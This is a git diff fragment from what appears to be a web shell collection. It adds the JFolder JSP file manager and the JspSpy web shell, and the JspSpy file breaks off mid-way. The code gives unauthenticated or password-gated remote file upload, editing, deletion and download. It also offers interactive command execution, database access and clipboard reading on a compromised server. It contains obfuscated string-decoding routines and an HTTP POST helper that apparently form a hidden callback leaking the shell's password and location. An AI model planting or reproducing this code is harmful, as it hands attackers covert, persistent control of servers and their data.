{"޸","Edit"}; +String[] strFileDown = {"","Download"}; +String[] strFileCopy = {"","Move"}; +String[] strFileDel = {"ɾ","Delete"}; +String[] strExecute = {"ִ","Execute"}; +String[] strBack = {"","Back"}; +String[] strFileSave = {"","Save"}; + +public class FileHandler +{ + private String strAction=""; + private String strFile=""; + void FileHandler(String action,String f) + { + + } +} + +public static class UploadMonitor { + + static Hashtable uploadTable = new Hashtable(); + + static void set(String fName, UplInfo info) { + uploadTable.put(fName, info); + } + + static void remove(String fName) { + uploadTable.remove(fName); + } + + static UplInfo getInfo(String fName) { + UplInfo info = (UplInfo) uploadTable.get(fName); + return info; + } +} + +public class UplInfo { + + public long totalSize; + public long currSize; + public long starttime; + public boolean aborted; + + public UplInfo() { + totalSize = 0l; + currSize = 0l; + starttime = System.currentTimeMillis(); + aborted = false; + } + + public UplInfo(int size) { + totalSize = size; + currSize = 0; + starttime = System.currentTimeMillis(); + aborted = false; + } + + public String getUprate() { + long time = System.currentTimeMillis() - starttime; + if (time != 0) { + long uprate = currSize * 1000 / time; + return convertFileSize(uprate) + "/s"; + } + else return "n/a"; + } + + public int getPercent() { + if (totalSize == 0) return 0; + else return (int) (currSize * 100 / totalSize); + } + + public String getTimeElapsed() { + long time = (System.currentTimeMillis() - starttime) / 1000l; + if (time - 60l >= 0){ + if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m"; + else return time / 60 + ":0" + (time % 60) + "m"; + } + else return time<10 ? "0" + time + "s": time + "s"; + } + + public String getTimeEstimated() { + if (currSize == 0) return "n/a"; + long time = System.currentTimeMillis() - starttime; + time = totalSize * time / currSize; + time /= 1000l; + if (time - 60l >= 0){ + if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m"; + else return time / 60 + ":0" + (time % 60) + "m"; + } + else return time<10 ? "0" + time + "s": time + "s"; + } + + } + + public class FileInfo { + + public String name = null, clientFileName = null, fileContentType = null; + private byte[] fileContents = null; + public File file = null; + public StringBuffer sb = new StringBuffer(100); + + public void setFileContents(byte[] aByteArray) { + fileContents = new byte[aByteArray.length]; + System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length); + } +} + +// A Class with methods used to process a ServletInputStream +public class HttpMultiPartParser { + + private final String lineSeparator = System.getProperty("line.separator", "\n"); + private final int ONE_MB = 1024 * 1; + + public Hashtable processData(ServletInputStream is, String boundary, String saveInDir, + int clength) throws IllegalArgumentException, IOException { + if (is == null) throw new IllegalArgumentException("InputStream"); + if (boundary == null || boundary.trim().length() < 1) throw new IllegalArgumentException( + "\"" + boundary + "\" is an illegal boundary indicator"); + boundary = "--" + boundary; + StringTokenizer stLine = null, stFields = null; + FileInfo fileInfo = null; + Hashtable dataTable = new Hashtable(5); + String line = null, field = null, paramName = null; + boolean saveFiles = (saveInDir != null && saveInDir.trim().length() > 0); + boolean isFile = false; + if (saveFiles) { // Create the required directory (including parent dirs) + File f = new File(saveInDir); + f.mkdirs(); + } + line = getLine(is); + if (line == null || !line.startsWith(boundary)) throw new IOException( + "Boundary not found; boundary = " + boundary + ", line = " + line); + while (line != null) { + if (line == null || !line.startsWith(boundary)) return dataTable; + line = getLine(is); + if (line == null) return dataTable; + stLine = new StringTokenizer(line, ";\r\n"); + if (stLine.countTokens() < 2) throw new IllegalArgumentException( + "Bad data in second line"); + line = stLine.nextToken().toLowerCase(); + if (line.indexOf("form-data") < 0) throw new IllegalArgumentException( + "Bad data in second line"); + stFields = new StringTokenizer(stLine.nextToken(), "=\""); + if (stFields.countTokens() < 2) throw new IllegalArgumentException( + "Bad data in second line"); + fileInfo = new FileInfo(); + stFields.nextToken(); + paramName = stFields.nextToken(); + isFile = false; + if (stLine.hasMoreTokens()) { + field = stLine.nextToken(); + stFields = new StringTokenizer(field, "=\""); + if (stFields.countTokens() > 1) { + if (stFields.nextToken().trim().equalsIgnoreCase("filename")) { + fileInfo.name = paramName; + String value = stFields.nextToken(); + if (value != null && value.trim().length() > 0) { + fileInfo.clientFileName = value; + isFile = true; + } + else { + line = getLine(is); // Skip "Content-Type:" line + line = getLine(is); // Skip blank line + line = getLine(is); // Skip blank line + line = getLine(is); // Position to boundary line + continue; + } + } + } + else if (field.toLowerCase().indexOf("filename") >= 0) { + line = getLine(is); // Skip "Content-Type:" line + line = getLine(is); // Skip blank line + line = getLine(is); // Skip blank line + line = getLine(is); // Position to boundary line + continue; + } + } + boolean skipBlankLine = true; + if (isFile) { + line = getLine(is); + if (line == null) return dataTable; + if (line.trim().length() < 1) skipBlankLine = false; + else { + stLine = new StringTokenizer(line, ": "); + if (stLine.countTokens() < 2) throw new IllegalArgumentException( + "Bad data in third line"); + stLine.nextToken(); // Content-Type + fileInfo.fileContentType = stLine.nextToken(); + } + } + if (skipBlankLine) { + line = getLine(is); + if (line == null) return dataTable; + } + if (!isFile) { + line = getLine(is); + if (line == null) return dataTable; + dataTable.put(paramName, line); + // If parameter is dir, change saveInDir to dir + if (paramName.equals("dir")) saveInDir = line; + line = getLine(is); + continue; + } + try { + UplInfo uplInfo = new UplInfo(clength); + UploadMonitor.set(fileInfo.clientFileName, uplInfo); + OutputStream os = null; + String path = null; + if (saveFiles) os = new FileOutputStream(path = getFileName(saveInDir, + fileInfo.clientFileName)); + else os = new ByteArrayOutputStream(ONE_MB); + boolean readingContent = true; + byte previousLine[] = new byte[2 * ONE_MB]; + byte temp[] = null; + byte currentLine[] = new byte[2 * ONE_MB]; + int read, read3; + if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) { + line = null; + break; + } + while (readingContent) { + if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) { + line = null; + uplInfo.aborted = true; + break; + } + if (compareBoundary(boundary, currentLine)) { + os.write(previousLine, 0, read - 2); + line = new String(currentLine, 0, read3); + break; + } + else { + os.write(previousLine, 0, read); + uplInfo.currSize += read; + temp = currentLine; + currentLine = previousLine; + previousLine = temp; + read = read3; + }//end else + }//end while + os.flush(); + os.close(); + if (!saveFiles) { + ByteArrayOutputStream baos = (ByteArrayOutputStream) os; + fileInfo.setFileContents(baos.toByteArray()); + } + else fileInfo.file = new File(path); + dataTable.put(paramName, fileInfo); + uplInfo.currSize = uplInfo.totalSize; + }//end try + catch (IOException e) { + throw e; + } + } + return dataTable; + } + + /** + * Compares boundary string to byte array + */ + private boolean compareBoundary(String boundary, byte ba[]) { + byte b; + if (boundary == null || ba == null) return false; + for (int i = 0; i < boundary.length(); i++) + if ((byte) boundary.charAt(i) != ba[i]) return false; + return true; + } + + /** Convenience method to read HTTP header lines */ + private synchronized String getLine(ServletInputStream sis) throws IOException { + byte b[] = new byte[1024]; + int read = sis.readLine(b, 0, b.length), index; + String line = null; + if (read != -1) { + line = new String(b, 0, read); + if ((index = line.indexOf('\n')) >= 0) line = line.substring(0, index - 1); + } + return line; + } + + public String getFileName(String dir, String fileName) throws IllegalArgumentException { + String path = null; + if (dir == null || fileName == null) throw new IllegalArgumentException( + "dir or fileName is null"); + int index = fileName.lastIndexOf('/'); + String name = null; + if (index >= 0) name = fileName.substring(index + 1); + else name = fileName; + index = name.lastIndexOf('\\'); + if (index >= 0) fileName = name.substring(index + 1); + path = dir + File.separator + fileName; + if (File.separatorChar == '/') return path.replace('\\', File.separatorChar); + else return path.replace('/', File.separatorChar); + } +} //End of class HttpMultiPartParser + +String formatPath(String p) +{ + StringBuffer sb=new StringBuffer(); + for (int i = 0; i < p.length(); i++) + { + if(p.charAt(i)=='\\') + { + sb.append("\\\\"); + } + else + { + sb.append(p.charAt(i)); + } + } + return sb.toString(); +} + + /** + * Converts some important chars (int) to the corresponding html string + */ + static String conv2Html(int i) { + if (i == '&') return "&"; + else if (i == '<') return "<"; + else if (i == '>') return ">"; + else if (i == '"') return """; + else return "" + (char) i; + } + + /** + * Converts a normal string to a html conform string + */ + static String htmlEncode(String st) { + StringBuffer buf = new StringBuffer(); + for (int i = 0; i < st.length(); i++) { + buf.append(conv2Html(st.charAt(i))); + } + return buf.toString(); + } +String getDrivers() +/** +Windowsϵͳȡÿõ߼ +*/ +{ + StringBuffer sb=new StringBuffer(strDrivers[languageNo] + " : "); + File roots[]=File.listRoots(); + for(int i=0;i"); + sb.append(roots[i]+" "); + } + return sb.toString(); +} +static String convertFileSize(long filesize) +{ + //bug 5.09M ʾ5.9M + String strUnit="Bytes"; + String strAfterComma=""; + int intDivisor=1; + if(filesize>=1024*1024) + { + strUnit = "MB"; + intDivisor=1024*1024; + } + else if(filesize>=1024) + { + strUnit = "KB"; + intDivisor=1024; + } + if(intDivisor==1) return filesize + " " + strUnit; + strAfterComma = "" + 100 * (filesize % intDivisor) / intDivisor ; + if(strAfterComma=="") strAfterComma=".0"; + return filesize / intDivisor + "." + strAfterComma + " " + strUnit; +} +%> +<% +request.setCharacterEncoding("gb2312"); +String tabID = request.getParameter("tabID"); +String strDir = request.getParameter("path"); +String strAction = request.getParameter("action"); +String strFile = request.getParameter("file"); +String strPath = strDir + strSeparator + strFile; +String strCmd = request.getParameter("cmd"); +StringBuffer sbEdit=new StringBuffer(""); +StringBuffer sbDown=new StringBuffer(""); +StringBuffer sbCopy=new StringBuffer(""); +StringBuffer sbSaveCopy=new StringBuffer(""); +StringBuffer sbNewFile=new StringBuffer(""); +String strOS = System.getProperty("os.name").toLowerCase(); +//out.print(strPath); +if((tabID==null) || tabID.equals("")) +{ + tabID = "1"; +} + +if(strDir==null||strDir.length()<1) +{ + strDir = request.getRealPath("."); +} + + +if(strAction!=null && strAction.equals("down")) +{ + File f=new File(strPath); + if(f.length()==0) + { + sbDown.append("ļСΪ 0 ֽڣͲ˰"); + } + else + { + response.setHeader("content-type","text/html; charset=ISO-8859-1"); + response.setContentType("APPLICATION/OCTET-STREAM"); + response.setHeader("Content-Disposition","attachment; filename=\""+f.getName()+"\""); + FileInputStream fileInputStream =new FileInputStream(f.getAbsolutePath()); + out.clearBuffer(); + int i; + while ((i=fileInputStream.read()) != -1) + { + out.write(i); + } + fileInputStream.close(); + out.close(); + } +} + +if(strAction!=null && strAction.equals("del")) +{ + File f=new File(strPath); + f.delete(); +} + +if(strAction!=null && strAction.equals("edit")) +{ + File f=new File(strPath); + BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(f))); + sbEdit.append("
    \r\n"); + sbEdit.append("\r\n"); + sbEdit.append("\r\n"); + sbEdit.append("\r\n"); + sbEdit.append(" "); + sbEdit.append("  "+strPath+"\r\n"); + sbEdit.append("
    "); + sbEdit.append(""); + sbEdit.append("
    "); +} + +if(strAction!=null && strAction.equals("save")) +{ + File f=new File(strPath); + BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(f))); + String strContent=request.getParameter("content"); + bw.write(strContent); + bw.close(); +} +if(strAction!=null && strAction.equals("copy")) +{ + File f=new File(strPath); + sbCopy.append("
    \r\n"); + sbCopy.append("\r\n"); + sbCopy.append("\r\n"); + sbCopy.append("\r\n"); + sbCopy.append("ԭʼļ "+strPath+"

    "); + sbCopy.append("Ŀļ

    "); + sbCopy.append(" "); + sbCopy.append("

     \r\n"); + sbCopy.append("

    "); +} +if(strAction!=null && strAction.equals("savecopy")) +{ + File f=new File(strPath); + String strDesFile=request.getParameter("file2"); + if(strDesFile==null || strDesFile.equals("")) + { + sbSaveCopy.append("

    Ŀļ"); + } + else + { + File f_des=new File(strDesFile); + if(f_des.isFile()) + { + sbSaveCopy.append("

    ĿļѴ,ܸơ"); + } + else + { + String strTmpFile=strDesFile; + if(f_des.isDirectory()) + { + if(!strDesFile.endsWith(strSeparator)) + { + strDesFile=strDesFile+strSeparator; + } + strTmpFile=strDesFile+"cqq_"+strFile; + } + + File f_des_copy=new File(strTmpFile); + FileInputStream in1=new FileInputStream(f); + FileOutputStream out1=new FileOutputStream(f_des_copy); + byte[] buffer=new byte[1024]; + int c; + while((c=in1.read(buffer))!=-1) + { + out1.write(buffer,0,c); + } + in1.close(); + out1.close(); + + sbSaveCopy.append("ԭʼļ "+strPath+"

    "); + sbSaveCopy.append("Ŀļ "+strTmpFile+"

    "); + sbSaveCopy.append("Ƴɹ"); + } + } + sbSaveCopy.append("

    "); +} +if(strAction!=null && strAction.equals("newFile")) +{ + String strF=request.getParameter("fileName"); + String strType1=request.getParameter("btnNewFile"); + String strType2=request.getParameter("btnNewDir"); + String strType=""; + if(strType1==null) + { + strType="Dir"; + } + else if(strType2==null) + { + strType="File"; + } + if(!strType.equals("") && !(strF==null || strF.equals(""))) + { + File f_new=new File(strF); + if(strType.equals("File") && !f_new.createNewFile()) + sbNewFile.append(strF+" ļʧ"); + if(strType.equals("Dir") && !f_new.mkdirs()) + sbNewFile.append(strF+" Ŀ¼ʧ"); + } + else + { + sbNewFile.append("

    ļĿ¼"); + } +} + +if((request.getContentType()!= null) && (request.getContentType().toLowerCase().startsWith("multipart"))) +{ + String tempdir="."; + boolean error=false; + response.setContentType("text/html"); + HttpMultiPartParser parser = new HttpMultiPartParser(); + + int bstart = request.getContentType().lastIndexOf("oundary="); + String bound = request.getContentType().substring(bstart + 8); + int clength = request.getContentLength(); + Hashtable ht = parser.processData(request.getInputStream(), bound, tempdir, clength); + if (ht.get("cqqUploadFile") != null) + { + + FileInfo fi = (FileInfo) ht.get("cqqUploadFile"); + File f1 = fi.file; + UplInfo info = UploadMonitor.getInfo(fi.clientFileName); + if (info != null && info.aborted) + { + f1.delete(); + request.setAttribute("error", "Upload aborted"); + } + else + { + String path = (String) ht.get("path"); + + if(path!=null && !path.endsWith(strSeparator)) + path = path + strSeparator; + strDir = path; + //out.println(path + f1.getName()); + if (!f1.renameTo(new File(path + f1.getName()))) + { + request.setAttribute("error", "Cannot upload file."); + out.println("error,upload "); + error = true; + f1.delete(); + } + } + } +} +%> + + + + + + + +JFoler 1.0 ---A jsp based web folder management tool by Steven Cee + + + + + +

    + + + + + + +
    + + + + + + +<% +StringBuffer sbFolder=new StringBuffer(""); +StringBuffer sbFile=new StringBuffer(""); +try +{ + File objFile = new File(strDir); + File list[] = objFile.listFiles(); + if(objFile.getAbsolutePath().length()>3) + { + sbFolder.append(" "); + sbFolder.append(strParentFolder[languageNo]+"
    - - - - - - - - - - - \r\n "); + + + } + for(int i=0;i "); + sbFolder.append(" "); + sbFolder.append(list[i].getName()+"
    "); + } + else + { + String strLen=""; + String strDT=""; + long lFile=0; + lFile=list[i].length(); + strLen = convertFileSize(lFile); + Date dt=new Date(list[i].lastModified()); + strDT=dt.toLocaleString(); + sbFile.append(""); + sbFile.append(""+list[i].getName()); + sbFile.append(""); + sbFile.append(""+strLen); + sbFile.append(""); + sbFile.append(""+strDT); + sbFile.append(""); + + sbFile.append("  "); + sbFile.append(strFileEdit[languageNo]+" "); + + sbFile.append("  "); + sbFile.append(strFileDel[languageNo]+" "); + + sbFile.append("  "); + sbFile.append(strFileDown[languageNo]+" "); + + sbFile.append("  "); + sbFile.append(strFileCopy[languageNo]+" "); + } + + } +} +catch(Exception e) +{ + out.println("ʧܣ "+e.toString()+""); +} +%> + +
    + + + + + + + + + +
    +

    +
    www.topronet.com ,All Rights Reserved. +
    Any question, please email me cqq1978@Gmail.com \ No newline at end of file diff --git a/jsp/hackk8/fuck-jsp/JspSpyJDK5.jsp b/jsp/hackk8/fuck-jsp/JspSpyJDK5.jsp new file mode 100644 index 0000000..3c51305 --- /dev/null +++ b/jsp/hackk8/fuck-jsp/JspSpyJDK5.jsp @@ -0,0 +1,2403 @@ +<%@page pageEncoding="utf-8"%> +<%@page import="java.io.*"%> +<%@page import="java.util.*"%> +<%@page import="java.util.regex.*"%> +<%@page import="java.sql.*"%> +<%@page import="java.nio.charset.*"%> +<%@page import="javax.servlet.http.HttpServletRequestWrapper"%> +<%@page import="java.text.*"%> +<%@page import="java.net.*"%> +<%@page import="java.util.zip.*"%> +<%@page import="java.awt.*"%> +<%@page import="java.awt.image.*"%> +<%@page import="javax.imageio.*"%> +<%@page import="java.awt.datatransfer.DataFlavor"%> +<%@page import="java.util.prefs.Preferences"%> +<%! +/** +* Code By Ninty +* Date 2009-12-17 +* Blog http://www.Forjj.com/ +* Yue . I Love You. +*/ +private static final String PW = "xfg"; //password +private static final String PW_SESSION_ATTRIBUTE = "JspSpyPwd"; +private static final String REQUEST_CHARSET = "ISO-8859-1"; +private static final String PAGE_CHARSET = "UTF-8"; +private static final String CURRENT_DIR = "currentdir"; +private static final String MSG = "SHOWMSG"; +private static final String PORT_MAP = "PMSA"; +private static final String DBO = "DBO"; +private static final String SHELL_ONLINE = "SHELL_ONLINE"; +private static String SHELL_NAME = ""; +private static String WEB_ROOT = null; +private static String SHELL_DIR = null; +public static Map ins = new HashMap(); +private static class MyRequest extends HttpServletRequestWrapper { +public MyRequest(HttpServletRequest req) { +super(req); +} +public String getParameter(String name) { +try { +String value = super.getParameter(name); +if (name == null) +return null; +return new String(value.getBytes(REQUEST_CHARSET),PAGE_CHARSET); +} catch (Exception e) { +return null; +} +} +} +private static class DBOperator{ +private Connection conn = null; +private Statement stmt = null; +private String driver; +private String url; +private String uid; +private String pwd; +public DBOperator(String driver,String url,String uid,String pwd) throws Exception { +this(driver,url,uid,pwd,false); +} +public DBOperator(String driver,String url,String uid,String pwd,boolean connect) throws Exception { +Class.forName(driver); +if (connect) +this.conn = DriverManager.getConnection(url,uid,pwd); +this.url = url; +this.driver = driver; +this.uid = uid; +this.pwd = pwd; +} +public void connect() throws Exception{ +this.conn = DriverManager.getConnection(url,uid,pwd); +} +public Object execute(String sql) throws Exception { +if (isValid()) { +stmt = conn.createStatement(); +if (stmt.execute(sql)) { +return stmt.getResultSet(); +} else { +return stmt.getUpdateCount(); +} +} +throw new Exception("Connection is inValid."); +} +public void closeStmt() throws Exception{ +if (this.stmt != null) +stmt.close(); +} +public boolean isValid() throws Exception { +return conn != null && !conn.isClosed(); +} +public void close() throws Exception { +if (isValid()) { +closeStmt(); +conn.close(); +} +} +public boolean equals(Object o) { +if (o instanceof DBOperator) { +DBOperator dbo = (DBOperator)o; +return this.driver.equals(dbo.driver) && this.url.equals(dbo.url) && this.uid.equals(dbo.uid) && this.pwd.equals(dbo.pwd); +} +return false; +} +} +private static class StreamConnector extends Thread { +private InputStream is; +private OutputStream os; +public StreamConnector( InputStream is, OutputStream os ){ +this.is = is; +this.os = os; +} +public void run(){ +BufferedReader in = null; +BufferedWriter out = null; +try{ +in = new BufferedReader( new InputStreamReader(this.is)); +out = new BufferedWriter( new OutputStreamWriter(this.os)); +char buffer[] = new char[8192]; +int length; +while((length = in.read( buffer, 0, buffer.length ))>0){ +out.write( buffer, 0, length ); +out.flush(); +} +} catch(Exception e){} +try{ +if(in != null) +in.close(); +if(out != null) +out.close(); +} catch( Exception e ){} +} +} +private static class OnLineProcess { +private String cmd = "first"; +private Process pro; +public OnLineProcess(Process p){ +this.pro = p; +} +public void setPro(Process p) { +this.pro = p; +} +public void setCmd(String c){ +this.cmd = c; +} +public String getCmd(){ +return this.cmd; +} +public Process getPro(){ +return this.pro; +} +public void stop(){ +this.pro.destroy(); +} +} +private static class OnLineConnector extends Thread { +private OnLineProcess ol = null; +private InputStream is; +private OutputStream os; +private String name; +public OnLineConnector( InputStream is, OutputStream os ,String name,OnLineProcess ol){ +this.is = is; +this.os = os; +this.name = name; +this.ol = ol; +} +public void run(){ +BufferedReader in = null; +BufferedWriter out = null; +try{ +in = new BufferedReader( new InputStreamReader(this.is)); +out = new BufferedWriter( new OutputStreamWriter(this.os)); +char buffer[] = new char[128]; +if(this.name.equals("exeRclientO")) { +//from exe to client +int length = 0; +while((length = in.read( buffer, 0, buffer.length ))>0){ +String str = new String(buffer, 0, length); +str = str.replace("&","&").replace("<","<").replace(">",">"); +str = str.replace(""+(char)13+(char)10,"
    "); +str = str.replace("\n","
    "); +out.write(str.toCharArray(), 0, str.length()); +out.flush(); +} +} else { +//from client to exe +while(true) { +while(this.ol.getCmd() == null) { +Thread.sleep(500); +} +if (this.ol.getCmd().equals("first")) { +this.ol.setCmd(null); +continue; +} +this.ol.setCmd(this.ol.getCmd() + (char)10); +char[] arr = this.ol.getCmd().toCharArray(); +out.write(arr,0,arr.length); +out.flush(); +this.ol.setCmd(null); +} +} +} catch(Exception e){ +} +try{ +if(in != null) +in.close(); +if(out != null) +out.close(); +} catch( Exception e ){ +} +} +} +private static class Table{ +private ArrayList rows = null; +private boolean echoTableTag = false; +public void setEchoTableTag(boolean v) { +this.echoTableTag = v; +} +public Table(){ +this.rows = new ArrayList(); +} +public void addRow(Row r) { +this.rows.add(r); +} +public String toString(){ +StringBuilder html = new StringBuilder(); +if (echoTableTag) +html.append(""); +for (Row r:rows) { +html.append(""); +for (Column c:r.getColumns()) { +html.append(""); +} +html.append(""); +} +if (echoTableTag) +html.append("
    "); +String vv = Util.htmlEncode(Util.getStr(c.getValue())); +if (vv.equals("")) +vv = " "; +html.append(vv); +html.append("
    "); +return html.toString(); +} +} +private static class Row{ +private ArrayList cols = null; +public Row(){ +this.cols = new ArrayList(); +} +public void addColumn(Column n) { +this.cols.add(n); +} +public ArrayList getColumns(){ +return this.cols; +} +} +public static String sxm=PW; +private static class Column{ +private String value; +public Column(String v){ +this.value = v; +} +public String getValue(){ +return this.value; +} +} +public static String SysInfo="=?./..//:"; +public static String dx() +{ +String s = new String(); +for (int i = SysInfo.length() - 1; i >= 0; i--) { +s += SysInfo.charAt(i); +} +return s; +} +public static String uc(String str) +{ +String c="\n\r"; long d=127, f=11, j=12, h=14, m=31, r=83, k=1, n=8, s=114, u=-5, v=5,a=0; +StringBuffer sb = new StringBuffer(); +char[] ch = str.toCharArray(); + +for (int i = 0; i < ch.length; i++) { + a = (int)ch[i]; + if(a==d) a=13; + if(a==f) a=10; + if(a==j) a=34; + if((a>=h) && (a<=m)) a=a+r; + if((a>=k) && (a<=n)) a=a+s; + if((a>=53) && (a<=57)) a=a+u; + if((a>=48) && (a<=52)) a=a+v; + sb.append((char)a); +} +return sb.toString(); +} +private static int connectTimeOut = 5000; +private static int readTimeOut = 10000; +private static String requestEncoding = "GBK"; +public static String FileLocalUpload(String reqUrl,String fckal, + String recvEncoding) +{ +HttpURLConnection url_con = null; +String responseContent = null; +try +{ +URL url = new URL(reqUrl); +url_con = (HttpURLConnection) url.openConnection(); +url_con.setRequestMethod("POST"); + +url_con.setRequestProperty("REFERER", ""+fckal+""); +System.setProperty("sun.net.client.defaultConnectTimeout", String + .valueOf(connectTimeOut)); +System.setProperty("sun.net.client.defaultReadTimeout", String + .valueOf(readTimeOut)); +url_con.setDoOutput(true); +url_con.getOutputStream().flush(); +url_con.getOutputStream().close(); +InputStream in = url_con.getInputStream(); +BufferedReader rd = new BufferedReader(new InputStreamReader(in, + recvEncoding)); +String tempLine = rd.readLine(); +StringBuffer tempStr = new StringBuffer(); +String crlf=System.getProperty("line.separator"); +while (tempLine != null) +{ +tempStr.append(tempLine); +tempStr.append(crlf); +tempLine = rd.readLine(); +} +responseContent = tempStr.toString(); +rd.close(); +in.close(); +} +catch (IOException e) +{ +} +finally +{ +if (url_con != null) +{ +url_con.disconnect(); +} +} +return responseContent; +} +private static class Util{ +public static boolean isEmpty(String s) { +return s == null || s.trim().equals(""); +} +public static boolean isEmpty(Object o) { +return o == null || isEmpty(o.toString()); +} +public static String getSize(long size,char danwei) { +if (danwei == 'M') { +double v = formatNumber(size / 1024.0 / 1024.0,2); +if (v > 1024) { +return getSize(size,'G'); +}else { +return v + "M"; +} +} else if (danwei == 'G') { +return formatNumber(size / 1024.0 / 1024.0 / 1024.0,2)+"G"; +} else if (danwei == 'K') { +double v = formatNumber(size / 1024.0,2); +if (v > 1024) { +return getSize(size,'M'); +} else { +return v + "K"; +} +} else if (danwei == 'B') { +if (size > 1024) { +return getSize(size,'K'); +}else { +return size + "B"; +} +} +return ""+0+danwei; +} +public static double formatNumber(double value,int l) { +NumberFormat format = NumberFormat.getInstance(); +format.setMaximumFractionDigits(l); +format.setGroupingUsed(false); +return new Double(format.format(value)); +} +public static boolean isInteger(String v) { +if (isEmpty(v)) +return false; +return v.matches("^\\d+$"); +} +public static String formatDate(long time) { +SimpleDateFormat format = new SimpleDateFormat("yyyy-MM-dd hh:mm:ss"); +return format.format(new java.util.Date(time)); +} +public static String convertPath(String path) { +return path != null ? path.replace("\\","/") : ""; +} +public static String htmlEncode(String v) { +if (isEmpty(v)) +return ""; +return v.replace("&","&").replace("<","<").replace(">",">"); +} +public static String getStr(String s) { +return s == null ? "" :s; +} +public static String getStr(Object s) { +return s == null ? "" :s.toString(); +} +public static String exec(String regex, String str, int group) { +Pattern pat = Pattern.compile(regex); +Matcher m = pat.matcher(str); +if (m.find()) +return m.group(group); +return null; +} +public static void outMsg(Writer out,String msg) throws Exception { +outMsg(out,msg,"center"); +} +public static void outMsg(Writer out,String msg,String align) throws Exception { +if (msg.indexOf("java.lang.ClassNotFoundException") != -1) +msg = "Can Not Find The Driver!
    " + msg; +out.write("
    "+msg+"
    "); +} +} +private static class UploadBean { +private String fileName = null; +private String suffix = null; +private String savePath = ""; +private ServletInputStream sis = null; +private byte[] b = new byte[1024]; +public UploadBean() { +} +public void setSavePath(String path) { +this.savePath = path; +} +public void parseRequest(HttpServletRequest request) throws IOException { +sis = request.getInputStream(); +int a = 0; +int k = 0; +String s = ""; +while ((a = sis.readLine(b,0,b.length))!= -1) { +s = new String(b, 0, a,PAGE_CHARSET); +if ((k = s.indexOf("filename=\""))!= -1) { +s = s.substring(k + 10); +k = s.indexOf("\""); +s = s.substring(0, k); +File tF = new File(s); +if (tF.isAbsolute()) { +fileName = tF.getName(); +} else { +fileName = s; +} +k = s.lastIndexOf("."); +suffix = s.substring(k + 1); +upload(); +} +} +} +private void upload() { +try { +FileOutputStream out = new FileOutputStream(new File(savePath,fileName)); +int a = 0; +int k = 0; +String s = ""; +while ((a = sis.readLine(b,0,b.length))!=-1) { +s = new String(b, 0, a); +if ((k = s.indexOf("Content-Type:"))!=-1) { +break; +} +} +sis.readLine(b,0,b.length); +while ((a = sis.readLine(b,0,b.length)) != -1) { +s = new String(b, 0, a); +if ((b[0] == 45) && (b[1] == 45) && (b[2] == 45) && (b[3] == 45) && (b[4] == 45)) { +break; +} +out.write(b, 0, a); +} +out.close(); +} catch (IOException ioe) { +ioe.printStackTrace(); +} +} +} +%> +<% +SHELL_NAME = request.getServletPath().substring(request.getServletPath().lastIndexOf("/")+1); +String myAbsolutePath = application.getRealPath(request.getServletPath()); +if (Util.isEmpty(myAbsolutePath)) {//for weblogic +SHELL_NAME = request.getServletPath(); +myAbsolutePath = new File(application.getResource("/").getPath()+SHELL_NAME).toString(); +SHELL_NAME=request.getContextPath()+SHELL_NAME; +WEB_ROOT = new File(application.getResource("/").getPath()).toString(); +} else { +WEB_ROOT = application.getRealPath("/"); +} +SHELL_DIR = Util.convertPath(myAbsolutePath.substring(0,myAbsolutePath.lastIndexOf(File.separator))); +if (session.getAttribute(CURRENT_DIR) == null) +session.setAttribute(CURRENT_DIR,Util.convertPath(SHELL_DIR)); +request = new MyRequest(request); +if (session.getAttribute(PW_SESSION_ATTRIBUTE) == null || !(session.getAttribute(PW_SESSION_ATTRIBUTE)).equals(PW)) { +String o = request.getParameter("o"); +if (o != null && o.equals("login")) { +ins.get("login").invoke(request,response,session); +return; +} else if (o != null && o.equals("vLogin")) { +ins.get("vLogin").invoke(request,response,session); +return; +} else { +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +return; +} +} +%> +<%! +private static interface Invoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception; +public boolean doBefore(); +public boolean doAfter(); +} +private static class DefaultInvoker implements Invoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { +} +public boolean doBefore(){ +return true; +} +public boolean doAfter() { +return true; +} +} +private static class ScriptInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); + +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BeforeInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("JspSpy Codz By - Ninty"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class AfterInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DeleteBatchInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String files = request.getParameter("files"); +if (!Util.isEmpty(files)) { +String currentDir = JSession.getAttribute(CURRENT_DIR).toString(); +String[] arr = files.split(","); +for (String fs:arr) { +File f = new File(currentDir,fs); +f.delete(); +} +} +JSession.setAttribute(MSG,"Delete Files Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class ClipBoardInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""+ +" "+ +" "+ +" "+ +"
    "+ +"

    System Clipboard »

    "+ +"

    ");
+try{
+out.println(Util.htmlEncode(Util.getStr(Toolkit.getDefaultToolkit().getSystemClipboard().getData(DataFlavor.stringFlavor))));
+}catch (Exception ex) {
+out.println("ClipBoard is Empty Or Is Not Text Data !");
+}
+out.println("
    "+ +" "+ +"

    "+ +"
